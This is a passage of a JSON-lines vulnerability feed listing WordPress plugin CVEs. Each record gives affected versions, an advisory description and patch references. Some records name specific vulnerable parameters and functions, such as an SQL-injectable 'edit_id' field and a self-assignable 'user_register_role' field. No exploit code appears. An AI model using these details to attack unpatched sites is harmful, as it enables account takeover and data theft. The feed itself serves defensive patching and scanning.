version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-coming-soon\\\/trunk\\\/backend\\\/tabs-content\\\/templates\\\/frontend-part\\\/display-template.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bef108a-2c68-4347-bf53-559b2d877f6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bef108a-2c68-4347-bf53-559b2d877f6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12287","slug":"biagiotti-membership","versionImpact":"1.0.2","versionEndExcluding":"1.1","description":"The Biagiotti Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as other users, such as administrators, granted they have access to an email.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/biagiotti-beauty-and-cosmetics-shop\\\/24645919\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/biagiotti-beauty-and-cosmetics-shop\\\/24645919\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f319df-41eb-484a-8fca-af6ae76f4179?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f319df-41eb-484a-8fca-af6ae76f4179?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2635","slug":"accessibility-help-button","versionEndExcluding":"1.1","description":"The Call Now Accessibility Button WordPress plugin before 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81b89613-18d0-4c13-84e3-9e2e1802fd7c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81b89613-18d0-4c13-84e3-9e2e1802fd7c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1564","slug":"setsail-membership","versionImpact":"1.0.3","versionEndExcluding":"1.1","description":"The SetSail Membership plugin for WordPress is vulnerable to  in all versions up to, and including, 1.0.3. This is due to the plugin not properly verifying a users identity through the social login. This makes it possible for unauthenticated attackers to log in as any user, including administrators and take over access to their account.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/setsail-travel-agency-theme\\\/22832625\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/setsail-travel-agency-theme\\\/22832625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c2385e-0d1e-435a-9b82-972964084148?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2c2385e-0d1e-435a-9b82-972964084148?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11885","slug":"ninjateam-telegram","versionImpact":"1.0","versionEndExcluding":"1.1","description":"The NinjaTeam Chat for Telegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'njtele_button shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209678%40ninjateam-telegram&new=3209678%40ninjateam-telegram\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209678%40ninjateam-telegram&new=3209678%40ninjateam-telegram\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338d9348-da24-44b9-ac97-a7a8a7376815?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/338d9348-da24-44b9-ac97-a7a8a7376815?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3344","slug":"auto-location-for-wp-job-manager","versionEndExcluding":"1.1","description":"The Auto Location for WP Job Manager via Google WordPress plugin before 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d27bc628-3de1-421e-8a67-150e9d7a96dd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d27bc628-3de1-421e-8a67-150e9d7a96dd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3278","slug":"urbango-membership","versionImpact":"1.0.4","versionEndExcluding":"1.1","description":"The UrbanGo Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.0.4. This is due to the plugin allowing users who are registering new accounts to set their own role or by supplying 'user_register_role' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/urbango-directory-and-listing-wordpress-theme\\\/22712624\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/urbango-directory-and-listing-wordpress-theme\\\/22712624\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/913ffe0c-c8f8-4cda-be9a-96c056d4c4a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/913ffe0c-c8f8-4cda-be9a-96c056d4c4a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10016","slug":"simple-download-button-shortcode","versionImpact":"1.0","versionEndExcluding":"1.1","description":"A vulnerability classified as problematic has been found in Halulu simple-download-button-shortcode Plugin 1.0 on WordPress. Affected is an unknown function of the file simple-download-button_dl.php of the component Download Handler. The manipulation of the argument file leads to information disclosure. It is possible to launch the attack remotely. Upgrading to version 1.1 is able to address this issue. The patch is identified as e648a8706818297cf02a665ae0bae1c069dea5f1. It is recommended to upgrade the affected component. VDB-242190 is the identifier assigned to this vulnerability.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.242190\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.242190\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simple-download-button-shortcode\\\/commit\\\/e648a8706818297cf02a665ae0bae1c069dea5f1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simple-download-button-shortcode\\\/commit\\\/e648a8706818297cf02a665ae0bae1c069dea5f1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.242190\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.242190\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12446","slug":"post-to-pdf","versionImpact":"1.0","versionEndExcluding":"1.1","description":"The Post to Pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gmptp_single_post' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207671%40post-to-pdf&new=3207671%40post-to-pdf&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207671%40post-to-pdf&new=3207671%40post-to-pdf&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4825","slug":"wp-showhide","versionEndExcluding":"1.05","description":"The WP-ShowHide WordPress plugin before 1.05 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2758983-d3a7-4718-b5b8-30169df6780a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2758983-d3a7-4718-b5b8-30169df6780a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9598","slug":"accelerated-mobile-pages","versionImpact":"1.0.99.1","versionEndExcluding":"1.0.99.2","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.99.1. This is due to missing or incorrect nonce validation on the 'proxy' function. This makes it possible for unauthenticated attackers to send the logged in user's cookies to their own server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.99.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b155ec8-d69d-40cf-8bea-201629bc9ca6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b155ec8-d69d-40cf-8bea-201629bc9ca6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.98\\\/includes\\\/options\\\/redux-core\\\/inc\\\/class.p.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.98\\\/includes\\\/options\\\/redux-core\\\/inc\\\/class.p.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174071\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174071\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1484","slug":"ameliabooking","versionImpact":"1.0.98","versionEndExcluding":"1.0.99","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the date parameters in all versions up to, and including, 1.0.98 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.99, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3105","slug":"vehica-core","versionImpact":"1.0.97","versionEndExcluding":"1.0.98","description":"The Vehica Core plugin for WordPress, used by the Vehica - Car Dealer & Listing WordPress Theme, is vulnerable to privilege escalation in all versions up to, and including, 1.0.97. This is due to the plugin not properly validating user meta fields prior to updating them in the database. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change escalate their privileges to Administrator.","recommendation":"Update to version 1.0.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/support.vehica.com\\\/support\\\/solutions\\\/articles\\\/101000393710\",\"name\":\"https:\\\/\\\/support.vehica.com\\\/support\\\/solutions\\\/articles\\\/101000393710\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b787d6f-d002-4f09-8336-ebb91321e20b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b787d6f-d002-4f09-8336-ebb91321e20b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6808","slug":"ameliabooking","versionImpact":"1.0.93","versionEndExcluding":"1.0.94","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aafb5402-3553-4c89-86e0-4dd556d86074?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aafb5402-3553-4c89-86e0-4dd556d86074?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015149\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015149\\\/ameliabooking\\\/trunk\\\/view\\\/frontend\\\/events.inc.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4693","slug":"user-verification","versionEndExcluding":"1.0.94","description":"The User Verification WordPress plugin before 1.0.94 was affected by an Auth Bypass security vulnerability. To bypass authentication, we only need to know the user\u2019s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrative role on the website.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1eee10a8-135f-4b76-8289-c381ff1f51ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1eee10a8-135f-4b76-8289-c381ff1f51ea\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/eeabe1d3-6f64-400a-8fb2-0865efdf6957\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/eeabe1d3-6f64-400a-8fb2-0865efdf6957\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0587","slug":"accelerated-mobile-pages","versionImpact":"1.0.92.1","versionEndExcluding":"1.0.93","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85ca96a6-7992-424b-8b88-9a0751925223?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85ca96a6-7992-424b-8b88-9a0751925223?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024147\\\/accelerated-mobile-pages\\\/trunk\\\/includes\\\/disqus.html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024147\\\/accelerated-mobile-pages\\\/trunk\\\/includes\\\/disqus.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6782","slug":"accelerated-mobile-pages","versionImpact":"1.0.92","versionEndExcluding":"1.0.92.1","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.92 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.92.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cae64e-caed-43c0-9a75-9aa4234946a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cae64e-caed-43c0-9a75-9aa4234946a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/accelerated-mobile-pages\\\/trunk\\\/templates\\\/features.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/accelerated-mobile-pages\\\/trunk\\\/templates\\\/features.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010797%40accelerated-mobile-pages%2Ftrunk&old=2998126%40accelerated-mobile-pages%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010797%40accelerated-mobile-pages%2Ftrunk&old=2998126%40accelerated-mobile-pages%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1890","slug":"tablesome","versionEndExcluding":"1.0.9","description":"The Tablesome WordPress plugin before 1.0.9 does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef64490-30cd-4e07-9b7c-64f551944f3d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef64490-30cd-4e07-9b7c-64f551944f3d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1462","slug":"maintenance-page","versionImpact":"1.0.8","versionEndExcluding":"1.0.9","description":"The Maintenance Page plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 1.0.8 via the REST API. This makes it possible for unauthenticated attackers to view post titles and content when the site is in maintenance mode.","recommendation":"Update to version 1.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/653bf021-370d-4787-9ded-c5c915aed1d6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0154","slug":"gamipress-vimeo-integration","versionEndExcluding":"1.0.9","description":"The GamiPress WordPress plugin before 1.0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e66e173-776d-4423-b4a2-eb7316b2502f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e66e173-776d-4423-b4a2-eb7316b2502f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5203","slug":"activitytime","versionImpact":"1.0.8","versionEndExcluding":"1.0.9","description":"The WP Sessions Time Monitoring Full Automatic WordPress plugin before 1.0.9 does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error\/union based technique.","recommendation":"Update to version 1.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f4f505b-2667-4e0f-9841-9c1cd0831932\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f4f505b-2667-4e0f-9841-9c1cd0831932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8483","slug":"mas-static-content","versionImpact":"1.0.8","versionEndExcluding":"1.0.9","description":"The MAS Static Content plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.8 via the static_content() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract potentially sensitive information from private static content pages.","recommendation":"Update to version 1.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/794bc5cd-c9ac-4583-ae3d-a92361374b5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/794bc5cd-c9ac-4583-ae3d-a92361374b5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-static-content\\\/tags\\\/1.0.8\\\/includes\\\/class-mas-static-content-shortcodes.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-static-content\\\/tags\\\/1.0.8\\\/includes\\\/class-mas-static-content-shortcodes.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151679%40mas-static-content&new=3151679%40mas-static-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151679%40mas-static-content&new=3151679%40mas-static-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0791","slug":"bulk-editor","versionImpact":"1.0.8.1","versionEndExcluding":"1.0.8.2","description":"The WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms.","recommendation":"Update to version 1.0.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0790","slug":"bulk-editor","versionImpact":"1.0.8.1","versionEndExcluding":"1.0.8.2","description":"The WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request.","recommendation":"Update to version 1.0.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13531","slug":"shipengine-shipping-quotes","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The ShipEngine Shipping Quotes plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 1.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shipengine-shipping-quotes\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shipengine-shipping-quotes\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb7bdcf-9f93-4c86-a4b3-ad5aaf7521b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb7bdcf-9f93-4c86-a4b3-ad5aaf7521b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
